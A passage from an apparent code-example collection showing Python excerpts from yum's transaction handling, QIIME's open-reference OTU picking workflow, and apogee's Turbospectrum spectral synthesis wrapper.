        if unlock(): return 200
        return 1
    elif result == 2:
        # Continue on
        pass
    elif result == 100:
        if unlock(): return 200
        return 100
    else:
        logger.critical(_('Unknown Error(s): Exit Code: %d:'), result)
        for msg in resultmsgs:
            logger.critical(msg)
        if unlock(): return 200
        return 3

    # Mainly for ostree, but might be useful for others.
    if base.conf.usr_w_check:
        usrinstpath = base.conf.installroot + "/usr"
        usrinstpath = usrinstpath.replace('//', '/')
        if (os.path.exists(usrinstpath) and
            not os.access(usrinstpath, os.W_OK)):
            logger.critical(_('No write access to %s directory') % usrinstpath)
            logger.critical(_('  Maybe this is an ostree image?'))
            logger.critical(_('  To disable you can use --setopt=usr_w_check=false'))
            if unlock(): return 200
            return 1
            
    # Depsolve stage
    verbose_logger.log(logginglevels.INFO_2, _('Resolving Dependencies'))

    try:
        (result, resultmsgs) = base.buildTransaction() 
    except plugins.PluginYumExit, e:
        return exPluginExit(e)
    except Errors.RepoError, e:
        return exRepoError(e)
    except Errors.YumBaseError, e:
        result = 1
        resultmsgs = [exception2msg(e)]
    except KeyboardInterrupt:
        return exUserCancel()
    except IOError, e:
        return exIOError(e)
   
    # Act on the depsolve result
    if result == 0:
        # Normal exit
        if unlock(): return 200
        return base.exit_code
    elif result == 1:
        # Fatal error
        for prefix, msg in base.pretty_output_restring(resultmsgs):
            logger.critical(prefix, msg)
        if base._depsolving_failed:
            if not base.conf.skip_broken:
                verbose_logger.info(_(" You could try using --skip-broken to work around the problem"))
            rpmdb_warn_checks()
        if unlock(): return 200
        return 1
    elif result == 2:
        # Continue on
        pass
    else:
        logger.critical(_('Unknown Error(s): Exit Code: %d:'), result)
        for msg in resultmsgs:
            logger.critical(msg)
        if unlock(): return 200
        return 3

    verbose_logger.log(logginglevels.INFO_2, _('\nDependencies Resolved'))

    # Run the transaction
    try:
        inhibit = {'what' : 'shutdown:idle',
                   'who'  : 'yum cli',
                   'why'  : 'Running transaction', # i18n?
                   'mode' : 'block'}
        return_code = base.doTransaction(inhibit=inhibit)
    except plugins.PluginYumExit, e:
        return exPluginExit(e)
    except Errors.RepoError, e:
        return exRepoError(e)
    except Errors.YumBaseError, e:
        return exFatal(e)
    except KeyboardInterrupt:
        return exUserCancel()
    except IOError, e:
        return exIOError(e)

    # rpm ts.check() failed.
    if type(return_code) == type((0,)) and len(return_code) == 2:
        (result, resultmsgs) = return_code
        for msg in resultmsgs:
            logger.critical("%s", msg)
        rpmdb_warn_checks()
        return_code = result
        if base._ts_save_file:
            verbose_logger.info(_("Your transaction was saved, rerun it with:\n yum load-transaction %s") % base._ts_save_file)
    elif return_code < 0:
        return_code = 1 # Means the pre-transaction checks failed...
        #  This includes:
        # . No packages.
        # . Hitting N at the prompt.
        # . GPG check failures.
        if base._ts_save_file:
            verbose_logger.info(_("Your transaction was saved, rerun it with:\n yum load-transaction %s") % base._ts_save_file)
    else:
        verbose_logger.log(logginglevels.INFO_2, _('Complete!'))

    if unlock(): return 200
    return return_code or base.exit_code

Example 145

Project: qiime
Source File: pick_open_reference_otus.py
View license
def pick_subsampled_open_reference_otus(input_fp,
                                        refseqs_fp,
                                        output_dir,
                                        percent_subsample,
                                        new_ref_set_id,
                                        command_handler,
                                        params,
                                        qiime_config,
                                        prefilter_refseqs_fp=None,
                                        run_assign_tax=True,
                                        run_align_and_tree=True,
                                        prefilter_percent_id=None,
                                        min_otu_size=2,
                                        step1_otu_map_fp=None,
                                        step1_failures_fasta_fp=None,
                                        parallel=False,
                                        suppress_step4=False,
                                        logger=None,
                                        suppress_md5=False,
                                        suppress_index_page=False,
                                        denovo_otu_picking_method='uclust',
                                        reference_otu_picking_method='uclust_ref',
                                        status_update_callback=print_to_stdout,
                                        minimum_failure_threshold=100000):
    """ Run the data preparation steps of Qiime

        The steps performed by this function are:
          - Pick reference OTUs against refseqs_fp
          - Subsample the failures to n sequences.
          - Pick OTUs de novo on the n failures.
          - Pick representative sequences for the resulting OTUs.
          - Pick reference OTUs on all failures using the
             representative set from step 4 as the reference set.

    """
    # for now only allowing uclust/usearch/sortmerna+sumaclust for otu picking
    allowed_denovo_otu_picking_methods = ['uclust', 'usearch61', 'sumaclust']
    allowed_reference_otu_picking_methods = ['uclust_ref', 'usearch61_ref',
                                             'sortmerna']
    assert denovo_otu_picking_method in allowed_denovo_otu_picking_methods,\
        "Unknown de novo OTU picking method: %s. Known methods are: %s"\
        % (denovo_otu_picking_method,
           ','.join(allowed_denovo_otu_picking_methods))

    assert reference_otu_picking_method in allowed_reference_otu_picking_methods,\
        "Unknown reference OTU picking method: %s. Known methods are: %s"\
        % (reference_otu_picking_method,
           ','.join(allowed_reference_otu_picking_methods))

    # Prepare some variables for the later steps
    index_links = []
    input_dir, input_filename = split(input_fp)
    input_basename, input_ext = splitext(input_filename)
    create_dir(output_dir)
    commands = []
    if logger is None:
        log_fp = generate_log_fp(output_dir)
        logger = WorkflowLogger(log_fp,
                                params=params,
                                qiime_config=qiime_config)

        close_logger_on_success = True
        index_links.append(
                ('Run summary data',
                log_fp,
                _index_headers['run_summary']))
    else:
        close_logger_on_success = False


    if not suppress_md5:
        log_input_md5s(logger, [input_fp,
                                refseqs_fp,
                                step1_otu_map_fp,
                                step1_failures_fasta_fp])

    # if the user has not passed a different reference collection for the pre-filter,
    # used the main refseqs_fp. this is useful if the user wants to provide a smaller
    # reference collection, or to use the input reference collection when running in
    # iterative mode (rather than an iteration's new refseqs)
    if prefilter_refseqs_fp is None:
        prefilter_refseqs_fp = refseqs_fp

    # Step 1: Closed-reference OTU picking on the input file (if not already
    # complete)
    if step1_otu_map_fp and step1_failures_fasta_fp:
        step1_dir = '%s/step1_otus' % output_dir
        create_dir(step1_dir)
        logger.write("Using pre-existing reference otu map and failures.\n\n")
    else:
        if prefilter_percent_id is not None:
            prefilter_dir = '%s/prefilter_otus/' % output_dir
            prefilter_failures_list_fp = '%s/%s_failures.txt' % \
                (prefilter_dir, input_basename)
            prefilter_pick_otu_cmd = pick_reference_otus(
                input_fp, prefilter_dir, reference_otu_picking_method,
                prefilter_refseqs_fp, parallel, params, logger, prefilter_percent_id)
            commands.append(
                [('Pick Reference OTUs (prefilter)', prefilter_pick_otu_cmd)])

            prefiltered_input_fp = '%s/prefiltered_%s%s' %\
                (prefilter_dir, input_basename, input_ext)
            filter_fasta_cmd = 'filter_fasta.py -f %s -o %s -s %s -n' %\
                (input_fp, prefiltered_input_fp, prefilter_failures_list_fp)
            commands.append(
                [('Filter prefilter failures from input', filter_fasta_cmd)])
            index_links.append(
            ('Pre-filtered sequence identifiers '
             '(failed to hit reference at %1.1f%% identity)' % (float(prefilter_percent_id)*100),
                        prefilter_failures_list_fp,
                        _index_headers['sequences']))


            # Call the command handler on the list of commands
            command_handler(commands,
                            status_update_callback,
                            logger=logger,
                            close_logger_on_success=False)
            commands = []

            input_fp = prefiltered_input_fp
            input_dir, input_filename = split(input_fp)
            input_basename, input_ext = splitext(input_filename)
            if getsize(prefiltered_input_fp) == 0:
                raise ValueError(
                    "All sequences were discarded by the prefilter. "
                    "Are the input sequences in the same orientation "
                    "in your input file and reference file (you can "
                    "add 'pick_otus:enable_rev_strand_match True' to "
                    "your parameters file if not)? Are you using the "
                    "correct reference file?")

        # Build the OTU picking command
        step1_dir = \
            '%s/step1_otus' % output_dir
        step1_otu_map_fp = \
            '%s/%s_otus.txt' % (step1_dir, input_basename)
        step1_pick_otu_cmd = pick_reference_otus(
            input_fp, step1_dir, reference_otu_picking_method,
            refseqs_fp, parallel, params, logger)
        commands.append([('Pick Reference OTUs', step1_pick_otu_cmd)])

        # Build the failures fasta file
        step1_failures_list_fp = '%s/%s_failures.txt' % \
            (step1_dir, input_basename)
        step1_failures_fasta_fp = \
            '%s/failures.fasta' % step1_dir
        step1_filter_fasta_cmd = 'filter_fasta.py -f %s -s %s -o %s' %\
            (input_fp, step1_failures_list_fp, step1_failures_fasta_fp)

        commands.append([('Generate full failures fasta file',
                          step1_filter_fasta_cmd)])

        # Call the command handler on the list of commands
        command_handler(commands,
                        status_update_callback,
                        logger=logger,
                        close_logger_on_success=False)
        commands = []

    step1_repset_fasta_fp = \
        '%s/step1_rep_set.fna' % step1_dir
    step1_pick_rep_set_cmd = 'pick_rep_set.py -i %s -o %s -f %s' %\
        (step1_otu_map_fp, step1_repset_fasta_fp, input_fp)
    commands.append([('Pick rep set', step1_pick_rep_set_cmd)])

    # Call the command handler on the list of commands
    command_handler(commands,
                    status_update_callback,
                    logger=logger,
                    close_logger_on_success=False)
    commands = []
    # name the final otu map
    merged_otu_map_fp = '%s/final_otu_map.txt' % output_dir

    # count number of sequences in step 1 failures fasta file
    with open(abspath(step1_failures_fasta_fp), 'U') as step1_failures_fasta_f:
        num_failure_seqs, mean, std = count_seqs_from_file(step1_failures_fasta_f)

    # number of failures sequences is greater than the threshold,
    # continue to step 2,3 and 4
    run_step_2_and_3 = num_failure_seqs > minimum_failure_threshold

    if run_step_2_and_3:

        # Subsample the failures fasta file to retain (roughly) the
        # percent_subsample
        step2_dir = '%s/step2_otus/' % output_dir
        create_dir(step2_dir)
        step2_input_fasta_fp = \
                               '%s/subsampled_failures.fasta' % step2_dir
        subsample_fasta(step1_failures_fasta_fp,
                        step2_input_fasta_fp,
                        percent_subsample)

        logger.write('# Subsample the failures fasta file using API \n' +
                 'python -c "import qiime; qiime.util.subsample_fasta' +
                 '(\'%s\', \'%s\', \'%f\')\n\n"' % (abspath(step1_failures_fasta_fp),
                                                    abspath(
                                                        step2_input_fasta_fp),
                                                    percent_subsample))

        # Prep the OTU picking command for the subsampled failures
        step2_cmd = pick_denovo_otus(step2_input_fasta_fp,
                                     step2_dir,
                                     new_ref_set_id,
                                     denovo_otu_picking_method,
                                     params,
                                     logger)
        step2_otu_map_fp = '%s/subsampled_failures_otus.txt' % step2_dir

        commands.append([('Pick de novo OTUs for new clusters', step2_cmd)])

        # Prep the rep set picking command for the subsampled failures
        step2_repset_fasta_fp = '%s/step2_rep_set.fna' % step2_dir
        step2_rep_set_cmd = 'pick_rep_set.py -i %s -o %s -f %s' %\
            (step2_otu_map_fp, step2_repset_fasta_fp, step2_input_fasta_fp)
        commands.append(
            [('Pick representative set for subsampled failures', step2_rep_set_cmd)])

        step3_dir = '%s/step3_otus/' % output_dir
        step3_otu_map_fp = '%s/failures_otus.txt' % step3_dir
        step3_failures_list_fp = '%s/failures_failures.txt' % step3_dir

        # remove the indexed reference database from the dictionary of
        # parameters as it must be forced to build a new database
        # using the step2_repset_fasta_fp
        if reference_otu_picking_method == 'sortmerna':
            if 'sortmerna_db' in params['pick_otus']:
                del params['pick_otus']['sortmerna_db']

        step3_cmd = pick_reference_otus(
            step1_failures_fasta_fp,
            step3_dir,
            reference_otu_picking_method,
            step2_repset_fasta_fp,
            parallel,
            params,
            logger)

        commands.append([
            ('Pick reference OTUs using de novo rep set', step3_cmd)])

        index_links.append(
            ('Final map of OTU identifier to sequence identifers (i.e., "OTU map")',
             merged_otu_map_fp,
             _index_headers['otu_maps']))

    if not suppress_step4:
        step4_dir = '%s/step4_otus/' % output_dir
        if run_step_2_and_3:
            step3_failures_fasta_fp = '%s/failures_failures.fasta' % step3_dir
            step3_filter_fasta_cmd = 'filter_fasta.py -f %s -s %s -o %s' %\
                (step1_failures_fasta_fp,
                 step3_failures_list_fp, step3_failures_fasta_fp)
            commands.append([('Create fasta file of step3 failures',
                            step3_filter_fasta_cmd)])

            failures_fp = step3_failures_fasta_fp
            failures_otus_fp = 'failures_failures_otus.txt'
            failures_step = 'step3'
        else:
            failures_fp = step1_failures_fasta_fp
            failures_otus_fp = 'failures_otus.txt'
            failures_step = 'step1'
            step3_otu_map_fp = ""

        step4_cmd = pick_denovo_otus(failures_fp,
                                     step4_dir,
                                     '.'.join([new_ref_set_id, 'CleanUp']),
                                     denovo_otu_picking_method,
                                     params,
                                     logger)

        step4_otu_map_fp = '%s/%s' % (step4_dir, failures_otus_fp)
        commands.append([('Pick de novo OTUs on %s failures' % failures_step, step4_cmd)])

        # Merge the otu maps, note that we are explicitly using the '>' operator
        # otherwise passing the --force flag on the script interface would
        # append the newly created maps to the map that was previously created
        cat_otu_tables_cmd = 'cat %s %s %s > %s' %\
            (step1_otu_map_fp, step3_otu_map_fp,
             step4_otu_map_fp, merged_otu_map_fp)
        commands.append([('Merge OTU maps', cat_otu_tables_cmd)])
        step4_repset_fasta_fp = '%s/step4_rep_set.fna' % step4_dir
        step4_rep_set_cmd = 'pick_rep_set.py -i %s -o %s -f %s' %\
            (step4_otu_map_fp, step4_repset_fasta_fp, failures_fp)
        commands.append(
            [('Pick representative set for subsampled failures', step4_rep_set_cmd)])
    else:
        # Merge the otu maps, note that we are explicitly using the '>' operator
        # otherwise passing the --force flag on the script interface would
        # append the newly created maps to the map that was previously created
        if run_step_2_and_3:
            failures_fp = step3_failures_list_fp
        else:
            failures_fp = step1_failures_list_fp
            step3_otu_map_fp = ""

        cat_otu_tables_cmd = 'cat %s %s > %s' %\
            (step1_otu_map_fp, step3_otu_map_fp, merged_otu_map_fp)
        commands.append([('Merge OTU maps', cat_otu_tables_cmd)])

        # Move the step 3 failures file to the top-level directory
        commands.append([('Move final failures file to top-level directory',
                          'mv %s %s/final_failures.txt' % (failures_fp, output_dir))])

    command_handler(commands,
                    status_update_callback,
                    logger=logger,
                    close_logger_on_success=False)
    commands = []

    otu_fp = merged_otu_map_fp
    # Filter singletons from the otu map
    otu_no_singletons_fp = '%s/final_otu_map_mc%d.txt' % (output_dir,
                                                          min_otu_size)

    otus_to_keep = filter_otus_from_otu_map(
        otu_fp,
        otu_no_singletons_fp,
        min_otu_size)

    index_links.append(('Final map of OTU identifier to sequence identifers excluding '
                        'OTUs with fewer than %d sequences' % min_otu_size,
                        otu_no_singletons_fp,
                        _index_headers['otu_maps']))

    logger.write('# Filter singletons from the otu map using API \n' +
                 'python -c "import qiime; qiime.filter.filter_otus_from_otu_map' +
                 '(\'%s\', \'%s\', \'%d\')"\n\n' % (abspath(otu_fp),
                                                    abspath(
                                                        otu_no_singletons_fp),
                                                    min_otu_size))

    # make the final representative seqs file and a new refseqs file that
    # could be used in subsequent otu picking runs.
    # this is clunky. first, we need to do this without singletons to match
    # the otu map without singletons. next, there is a difference in what
    # we need the reference set to be and what we need the repseqs to be.
    # the reference set needs to be a superset of the input reference set
    # to this set. the repset needs to be only the sequences that were observed
    # in this data set, and we want reps for the step1 reference otus to be
    # reads from this run so we don't hit issues building a tree using
    # sequences of very different lengths. so...
    final_repset_fp = '%s/rep_set.fna' % output_dir
    index_links.append(
        ('OTU representative sequences',
         final_repset_fp,
         _index_headers['sequences']))
    final_repset_f = open(final_repset_fp, 'w')
    new_refseqs_fp = '%s/new_refseqs.fna' % output_dir
    index_links.append(
        ('New reference sequences (i.e., OTU representative sequences plus input '
         'reference sequences)',
         new_refseqs_fp,
         _index_headers['sequences']))
    # write non-singleton otus representative sequences from step1 to the
    # final rep set file
    for otu_id, seq in parse_fasta(open(step1_repset_fasta_fp, 'U')):
        if otu_id.split()[0] in otus_to_keep:
            final_repset_f.write('>%s\n%s\n' % (otu_id, seq))
    logger.write('# Write non-singleton otus representative sequences ' +
                 'from step1 to the final rep set file: %s\n\n' % final_repset_fp)
    # copy the full input refseqs file to the new refseqs_fp
    copyfile(refseqs_fp, new_refseqs_fp)
    new_refseqs_f = open(new_refseqs_fp, 'a')
    new_refseqs_f.write('\n')
    logger.write('# Copy the full input refseqs file to the new refseq file\n' +
                 'cp %s %s\n\n' % (refseqs_fp, new_refseqs_fp))
    # iterate over all representative sequences from step2 and step4 and write
    # those corresponding to non-singleton otus to the final representative set
    # file and the new reference sequences file.
    if run_step_2_and_3:
        for otu_id, seq in parse_fasta(open(step2_repset_fasta_fp, 'U')):
            if otu_id.split()[0] in otus_to_keep:
                new_refseqs_f.write('>%s\n%s\n' % (otu_id, seq))
                final_repset_f.write('>%s\n%s\n' % (otu_id, seq))
    if not suppress_step4:
        for otu_id, seq in parse_fasta(open(step4_repset_fasta_fp, 'U')):
            if otu_id.split()[0] in otus_to_keep:
                new_refseqs_f.write('>%s\n%s\n' % (otu_id, seq))
                final_repset_f.write('>%s\n%s\n' % (otu_id, seq))
    new_refseqs_f.close()
    final_repset_f.close()

    # steps 1-4 executed
    if run_step_2_and_3:
        logger.write('# Write non-singleton otus representative sequences from ' +
                     'step 2 and step 4 to the final representative set and the new reference' +
                     ' set (%s and %s respectively)\n\n' % (final_repset_fp, new_refseqs_fp))
    # only steps 1 and 4 executed
    else:
        logger.write('# Write non-singleton otus representative sequences from ' +
                     'step 4 to the final representative set and the new reference' +
                     ' set (%s and %s respectively)\n\n' % (final_repset_fp, new_refseqs_fp))

    # Prep the make_otu_table.py command
    otu_table_fp = '%s/otu_table_mc%d.biom' % (output_dir, min_otu_size)

    make_otu_table_cmd = 'make_otu_table.py -i %s -o %s' %\
        (otu_no_singletons_fp, otu_table_fp)
    commands.append([("Make the otu table", make_otu_table_cmd)])
    index_links.append(
        ('OTU table exluding OTUs with fewer than %d sequences' % min_otu_size,
         otu_table_fp,
         _index_headers['otu_tables']))
    command_handler(commands,
                    status_update_callback,
                    logger=logger,
                    close_logger_on_success=False)

    commands = []

    # initialize output file names - these differ based on what combination of
    # taxonomy assignment and alignment/tree building is happening.
    if run_assign_tax and run_align_and_tree:
        tax_input_otu_table_fp = otu_table_fp
        otu_table_w_tax_fp = \
            '%s/otu_table_mc%d_w_tax.biom' % (output_dir, min_otu_size)

        align_and_tree_input_otu_table = otu_table_w_tax_fp
        index_links.append(
            ('OTU table exluding OTUs with fewer than %d sequences and including OTU '
             'taxonomy assignments' % min_otu_size,
             otu_table_w_tax_fp,
             _index_headers['otu_tables']))

        pynast_failure_filtered_otu_table_fp = \
            '%s/otu_table_mc%d_w_tax_no_pynast_failures.biom' % (output_dir, min_otu_size)
        index_links.append(
            ('OTU table exluding OTUs with fewer than %d sequences and sequences that '
            'fail to align with PyNAST and including OTU taxonomy assignments' % min_otu_size,
             pynast_failure_filtered_otu_table_fp,
             _index_headers['otu_tables']))

    elif run_assign_tax:
        tax_input_otu_table_fp = otu_table_fp
        otu_table_w_tax_fp = \
            '%s/otu_table_mc%d_w_tax.biom' % (output_dir, min_otu_size)
        index_links.append(
            ('OTU table exluding OTUs with fewer than %d sequences and including OTU '
            'taxonomy assignments' % min_otu_size,
             otu_table_w_tax_fp,
             _index_headers['otu_tables']))

    elif run_align_and_tree:
        align_and_tree_input_otu_table = otu_table_fp
        pynast_failure_filtered_otu_table_fp = \
            '%s/otu_table_mc%d_no_pynast_failures.biom' % (output_dir,
                                                           min_otu_size)
        index_links.append(
            ('OTU table exluding OTUs with fewer than %d sequences and sequences that '
             'fail to align with PyNAST' % min_otu_size,
             pynast_failure_filtered_otu_table_fp,
             _index_headers['otu_tables']))

    if run_assign_tax:
        if exists(otu_table_w_tax_fp) and getsize(otu_table_w_tax_fp) > 0:
            logger.write(
                "Final output file exists (%s). Will not rebuild." %
                otu_table_w_tax_fp)
        else:
            # remove files from partially completed runs
            remove_files([otu_table_w_tax_fp], error_on_missing=False)

            taxonomy_fp = assign_tax(
                repset_fasta_fp=final_repset_fp,
                output_dir=output_dir,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                parallel=parallel,
                logger=logger,
                status_update_callback=status_update_callback)

            index_links.append(
                    ('OTU taxonomic assignments',
                    taxonomy_fp,
                    _index_headers['taxa_assignments']))

            # Add taxa to otu table
            add_metadata_cmd = 'biom add-metadata -i %s --observation-metadata-fp %s -o %s --sc-separated taxonomy --observation-header OTUID,taxonomy' %\
                (tax_input_otu_table_fp, taxonomy_fp, otu_table_w_tax_fp)
            commands.append([("Add taxa to OTU table", add_metadata_cmd)])

            command_handler(commands,
                            status_update_callback,
                            logger=logger,
                            close_logger_on_success=False)
            commands = []

    if run_align_and_tree:
        rep_set_tree_fp = join(output_dir, 'rep_set.tre')
        index_links.append(
            ('OTU phylogenetic tree',
             rep_set_tree_fp,
             _index_headers['trees']))
        if exists(pynast_failure_filtered_otu_table_fp) and\
           getsize(pynast_failure_filtered_otu_table_fp) > 0:
            logger.write("Final output file exists (%s). Will not rebuild." %
                         pynast_failure_filtered_otu_table_fp)
        else:
            # remove files from partially completed runs
            remove_files([pynast_failure_filtered_otu_table_fp],
                         error_on_missing=False)

            pynast_failures_fp = align_and_tree(
                repset_fasta_fp=final_repset_fp,
                output_dir=output_dir,
                command_handler=command_handler,
                params=params,
                qiime_config=qiime_config,
                parallel=parallel,
                logger=logger,
                status_update_callback=status_update_callback)

            # Build OTU table without PyNAST failures
            table = load_table(align_and_tree_input_otu_table)
            filtered_otu_table = filter_otus_from_otu_table(table,
                get_seq_ids_from_fasta_file(open(pynast_failures_fp, 'U')),
                0, inf, 0, inf, negate_ids_to_keep=True)
            write_biom_table(filtered_otu_table,
                             pynast_failure_filtered_otu_table_fp)

            command_handler(commands,
                            status_update_callback,
                            logger=logger,
                            close_logger_on_success=False)
            commands = []


    if close_logger_on_success:
        logger.close()

    if not suppress_index_page:
        index_fp = '%s/index.html' % output_dir
        generate_index_page(index_links, index_fp)

Example 146

Project: apogee
Source File: turbospec.py
View license
def turbosynth(*args,**kwargs):
    """
    NAME:
       turbosynth
    PURPOSE:
       Run a Turbospectrum synthesis (direct interface to the Turbospectrum code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves withe LSF and macrotubulence, and optionally continuum normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances:
          [Atomic number1,diff1]
          [Atomic number2,diff2]
          ...
          [Atomic numberM,diffM]
    SYNTHEIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'6.012':'0.9375','6.013':'0.0625'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000) spectral synthesis limits and step of calculation (see MOOG)
       babsma_wmin, babsma_wmax= (wmin,wmax)) allows opacity limits to be different (broader) than for the synthesis itself
       costheta= (1.) cosine of the viewing angle
    LINELIST KEYWORDS:
          air= (True) if True, perform the synthesis in air wavelengths (affects the default Hlinelist, nothing else; output is in air if air, vacuum otherwise); set to False at your own risk, as Turbospectrum expects the linelist in air wavelengths!)
          Hlinelist= (None) Hydrogen linelists to use; can be set to the path of a linelist file or to the name of an APOGEE linelist; if None, then we first search for the Hlinedata.vac in the APOGEE linelist directory (if air=False) or we use the internal Turbospectrum Hlinelist (if air=True)
       linelist= (None) molecular and atomic linelists to use; can be set to the path of a linelist file or to the name of an APOGEE linelist, or lists of such files; if a single filename is given, the code will first search for files with extensions '.atoms', '.molec' or that start with 'turboatoms.' and 'turbomolec.'
    ATMOSPHERE KEYWORDS:
       modelatm= (None) model-atmosphere instance
       vmicro= (2.) microturbulence (km/s)
       modelopac= (None) 
                  (a) if set to an existing filename: assume babsma_lu has already been run and use this continuous opacity in bsyn_lu
                  (b) if set to a non-existing filename: store the continuous opacity in this file
    MISCELLANEOUS KEYWORDS:
       dr= data release
       saveTurboInput= if set to a string, the input to and output from Turbospectrum will be saved as a tar.gz file with this name; can be a filename in the current directory or a full path
    OUTPUT:
       (wavelengths,cont-norm. spectrum, spectrum (nwave))
    HISTORY:
       2015-04-13 - Written - Bovy (IAS)
    """
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    babsma_wmin= kwargs.pop('babsma_wmin',wmin)
    babsma_wmax= kwargs.pop('babsma_wmax',wmax)
    if babsma_wmin > wmin or babsma_wmax < wmax:
        raise ValueError("Opacity wavelength range must encompass the synthesis range")
    if int(numpy.ceil((wmax-wmin)/dw > 150000)):
        raise ValueError('Too many wavelengths for Turbospectrum synthesis, reduce the wavelength step dw (to, e.g., 0.016)')
    costheta= kwargs.pop('costheta',1.)
    # Linelists
    Hlinelist= kwargs.pop('Hlinelist',None)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'6.012':'0.9375',
                   '6.013':'0.0625'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # We will run in a subdirectory of the current directory
    tmpDir= tempfile.mkdtemp(dir=os.getcwd())
    # Get the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            raise ValueError('modelatm= input is an existing filename, but you need to give an Atmosphere object instead')
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input needs to be an Atmosphere instance')
        else:
            # Check temperature
            if modelatm._teff > 7000.:
                warnings.warn('Turbospectrum does not include all necessary physics to model stars hotter than about 7000 K; proceed with caution',RuntimeWarning)
            # Write atmosphere to file
            modelfilename= os.path.join(tmpDir,'atm.mod')
            modelatm.writeto(modelfilename,turbo=True)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelists
    if Hlinelist is None:
        if kwargs.get('air',True):
            Hlinelist= 'DATA/Hlinedata' # will be symlinked
        else:
            Hlinelist= appath.linelistPath('Hlinedata.vac',
                                           dr=kwargs.get('dr',None))
    if not os.path.exists(Hlinelist) and not Hlinelist == 'DATA/Hlinedata':
        Hlinelist= appath.linelistPath(Hlinelist,
                                       dr=kwargs.get('dr',None))
    if not os.path.exists(Hlinelist) and not kwargs.get('air',True):
        print("Hlinelist in vacuum linelist not found, using Turbospectrum's, which is in air...")
        Hlinelist= 'DATA/Hlinedata' # will be symlinked
    linelistfilenames= [Hlinelist]
    if isinstance(linelist,str):
        if os.path.exists(linelist):
            linelistfilenames.append(linelist)
        else:
            # Try finding the linelist
            atomlinelistfilename= appath.linelistPath(\
                '%s.atoms' % linelist,
                dr=kwargs.get('dr',None))
            moleclinelistfilename= appath.linelistPath(\
                '%s.molec' % linelist,
                dr=kwargs.get('dr',None))
            if os.path.exists(atomlinelistfilename) \
                    and os.path.exists(moleclinelistfilename):
                linelistfilenames.append(atomlinelistfilename)
                linelistfilenames.append(moleclinelistfilename)
            else:
                atomlinelistfilename= appath.linelistPath(\
                    'turboatoms.%s' % linelist,
                    dr=kwargs.get('dr',None))
                moleclinelistfilename= appath.linelistPath(\
                    'turbomolec.%s' % linelist,
                    dr=kwargs.get('dr',None))
                if not os.path.exists(atomlinelistfilename) \
                        and '201404080919' in atomlinelistfilename \
                        and kwargs.get('air',True):
                    download.linelist(os.path.basename(atomlinelistfilename),
                                      dr=kwargs.get('dr',None))
                if not os.path.exists(moleclinelistfilename) \
                        and '201404080919' in moleclinelistfilename \
                        and kwargs.get('air',True):
                    download.linelist(os.path.basename(moleclinelistfilename),
                                      dr=kwargs.get('dr',None))
                if os.path.exists(atomlinelistfilename) \
                        and os.path.exists(moleclinelistfilename):
                    linelistfilenames.append(atomlinelistfilename)
                    linelistfilenames.append(moleclinelistfilename)
    if linelist is None or len(linelistfilenames) == 1:
        os.remove(modelfilename)
        os.rmdir(tmpDir)
        raise ValueError('linelist= must be set (see documentation) and given linelist must exist (either as absolute path or in the linelist directory)')
    # Link the Turbospectrum DATA directory
    os.symlink(os.getenv('TURBODATA'),os.path.join(tmpDir,'DATA'))
    # Cut the linelist to the desired wavelength range, if necessary,
    # Skipped because it is unnecessary, but left in case we still want to 
    # use it
    rmLinelists= False
    for ll, linelistfilename in enumerate(linelistfilenames[1:]):
        if not _CUTLINELIST: continue #SKIP
        if wmin == _WMIN_DEFAULT and wmax == _WMAX_DEFAULT: continue
        rmLinelists= True
        with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
            awkfile.write('($1>%.3f && $1<%.3f) || ( substr($1,1,1) == "' 
                          %(wmin-7.,wmax+7.) +"'"+'")\n')
        keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
        stderr= open('/dev/null','w')
        try:
            subprocess.check_call(['awk','-f','cutlines.awk',
                                   linelistfilename],
                                  cwd=tmpDir,stdout=keeplines,stderr=stderr)
            keeplines.close()
        except subprocess.CalledProcessError:
            os.remove(os.path.join(tmpDir,'lines.tmp'))
            os.remove(os.path.join(tmpDir,'DATA'))
            raise RuntimeError("Removing unnecessary linelist entries failed ...")
        finally:
            os.remove(os.path.join(tmpDir,'cutlines.awk'))
            stderr.close()
        # Remove elements that aren't used altogether, adjust nlines
        with open(os.path.join(tmpDir,'lines.tmp'),'r') as infile:
            lines= infile.readlines()
        nl_list= [l[0] == "'" for l in lines]
        nl= numpy.array(nl_list,dtype='int')
        nl_list.append(True)
        nl_list.append(True)
        nlines= [numpy.sum(1-nl[ii:nl_list[ii+2:].index(True)+ii+2]) 
                 for ii in range(len(nl))]
        with open(os.path.join(tmpDir,os.path.basename(linelistfilename)),
                  'w') \
                as outfile:
            for ii, line in enumerate(lines):
                if ii < len(lines)-2:
                    if not lines[ii][0] == "'":
                        outfile.write(lines[ii])
                    elif not (lines[ii+2][0] == "'" and lines[ii+1][0] == "'"):
                        if lines[ii+1][0] == "'":
                            # Adjust nlines                       
                            outfile.write(lines[ii].replace(lines[ii].split()[-1]+'\n',
                                                            '%i\n' % nlines[ii]))
                        else:
                            outfile.write(lines[ii])
                else:
                    if not lines[ii][0] == "'": outfile.write(lines[ii])
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        # cp the linelists to the temporary directory
        shutil.copy(linelistfilename,tmpDir)
        linelistfilenames[ll]= os.path.basename(linelistfilename)
    # Parse the abundances
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    indiv_abu= {}
